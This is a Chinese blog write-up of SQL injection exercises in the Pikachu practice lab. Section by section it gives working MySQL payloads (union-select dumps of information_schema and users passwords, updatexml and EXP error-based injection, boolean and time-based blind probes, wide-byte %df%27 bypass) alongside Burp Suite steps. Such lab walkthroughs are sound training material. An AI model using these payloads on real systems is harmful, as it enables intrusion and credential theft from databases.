码迷,mamicode.com
首页 > 数据库 > 详细

Pikachu靶场SQL注入刷题记录

时间:2020-02-17 23:58:56      阅读:203      评论:0      收藏:0      [点我收藏+]

标签:第一个   from   base   HERE   关注   sleep   sql   repeat   文章   

数字型注入

0x01

burp抓包,发送至repeater
后面加and 1=1,and 1=2 可判断存在注入
技术图片

0x02

通过order by判断字段数,order by 2 和order by 3 返回结果不同,可得字段数为2
技术图片

0x03

查看表名:
union select 1,group_concat(table_name) from information_schema.tables where table_schema = database()
技术图片

0x04

查询users表中的数据:
union select 1,group_concat(column_name) from information_schema.columns where table_name = ‘users‘
技术图片

0x05

查询数据:
union select 1,username from users
union select 1,password from users
技术图片
技术图片

字符型注入

0x01

加单引号报错,‘--+ 返回正常,可判断存在字符型注入
技术图片

0x02

通过上题可知有两个字段
查询表名:
‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema = database()--+
技术图片

0x03

查询users表中的数据:
‘ union select 1,group_concat(column_name) from information_schema.columns where table_name = ‘users‘--+
技术图片

0x04

查询数据:
‘ union select 1,username from users--+
‘ union select 1,password from users--+
技术图片
技术图片

搜索型注入

0x01

单引号报错,判断字段
‘ order by 3#时正常,‘ order by 4#时不正常
技术图片

0x02

已经知道含有users表,直接查列名
‘ union select 1,2,group_concat(column_name) from information_schema.columns where table_name = ‘users‘#
技术图片
技术图片

0x03

查password数据
‘ union select 1,2,password from users#
技术图片

XX型注入

0x01

输入单引号,得到报错信息
技术图片

可以看到有个)符号,那么sql语句中前面一定有个(符号,所以要将前面闭合,后面注释掉

0x02

输入‘)#,抓包repeater放包
技术图片

0x03

判断字段
%27)+order+by+2%23,回显正常
技术图片

%27)+order+by+3%23,回显不正常,字段数为2
技术图片

0x04

已知users表,查列名
%27)+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=‘users‘%23
技术图片

0x05

查密码
%27)+union+select+1,password+from+users%23
技术图片

insert/update注入

0x01

点击注册,用户名密码输入如下
技术图片

提交返回
技术图片

根据报错可推断前面sql语句大概是这样value(‘xxx‘,1,2,3,4,5)

0x02

使用updatexml()进行报错注入
‘ or updatexml(1,concat(0x7e,(SELECT password from users limit 0,1),0x7e),0) or ‘
技术图片

Updatexml只能注出32位字符,缺少一位字符,所以改用其他函数
经测试extractvalue()函数也是一样,再换其他函数

0x03

使用EXP函数时成功注出md5
‘ or EXP(~(SELECT * from(select @@version)a)) or ‘
‘ or EXP(~(SELECT * from(select group_concat(table_name) from information_schema.tables where table_schema = database())a)) or ‘
技术图片

‘ or EXP(~(SELECT * from(select group_concat(column_name) from information_schema.columns where table_name = ‘users‘)a)) or ‘
技术图片

‘ or EXP(~(SELECT * from(select password from users limit 0,1)a)) or ‘
技术图片

Delete注入

0x01

单引号报错
技术图片

0x02

这种id的值一般都是数字型注入
+or+EXP(~(SELECT+*+from(select+@@version)a))
技术图片

最终payload:+or+EXP(~(SELECT+*+from(select+password+from+users+limit+0,1)a))
技术图片

HTTP Header注入

0x01

提示给了账号密码
技术图片

登录进去

0x02

刷新,抓包
技术图片

可以看到Cookie中含有ant[uname]=admin,怀疑此处可能存在与数据库交互,因此加单引号进行验证
技术图片

发现报错,因此,使用报错注入语句

0x03

‘+or+EXP(~(SELECT+*+from(select+@@version)a))+or+‘
技术图片

‘ or EXP(~(SELECT * from(select group_concat(table_name) from information_schema.tables where table_schema = database())a)) or ‘
技术图片

‘ or EXP(~(SELECT * from(select group_concat(column_name) from information_schema.columns where table_name = ‘users‘)a)) or ‘
技术图片

‘ or EXP(~(SELECT * from(select password from users limit 0,1)a)) or ‘
技术图片

盲注(boolian)

0x01

首先要知道一个用户名(真实环境可自己注册一个)
lili‘ and 1=1#
技术图片

lili‘ and 1=2#
技术图片

可判断存在注入

0x02

paylaod:lili‘ and substr(database(),1,1)=‘字母‘#
对数字进行爆破
技术图片

第一个字母为p
再对第二位进行爆破
lili‘ and substr(database(),2,1)=‘字母‘#
技术图片

第二个字母为i
按此方式一位一位进行爆破,可得数据库名为pikachu

盲注(time)

0x01

首先要知道一个用户名(真实环境可自己注册一个)
lili‘ and sleep(10)#

10s左右才响应,可判断存在时间盲注(或者F12看响应时间)

0x02

爆破数据库名
lili‘ and if(substr(database(),1,1)=‘字母‘,sleep(5),1)#
对字母进行爆破,爆破第一个字母
爆破后将Columns--Response received选中,可看到响应时间
技术图片
技术图片

第一个字母为p
爆破第二个字母
lili‘ and if(substr(database(),2,1)=‘字母‘,sleep(5),1)#
技术图片

得到第二个为i
以此类推,得出数据库名为pikachu

宽字节注入

0x01

抓包在burp中操作
1%df%27+or+1=1#
技术图片

0x02

判断字段数
1%df%27+union+select+1,2#
技术图片

1%df%27+union+select+1,2,3#
技术图片

字段数为2

0x03

查表名
1%df%27+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()#
技术图片

0x04

查列名
1%df%27+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273#
(0x7573657273为users的16进制编码)
技术图片

0x05

查数据
1%df%27+union+select+1,password+from+users#
技术图片

更多技术文章请关注Timeline Sec公众号
技术图片

Pikachu靶场SQL注入刷题记录

标签:第一个   from   base   HERE   关注   sleep   sql   repeat   文章   

原文地址:https://www.cnblogs.com/paperpen/p/12324363.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!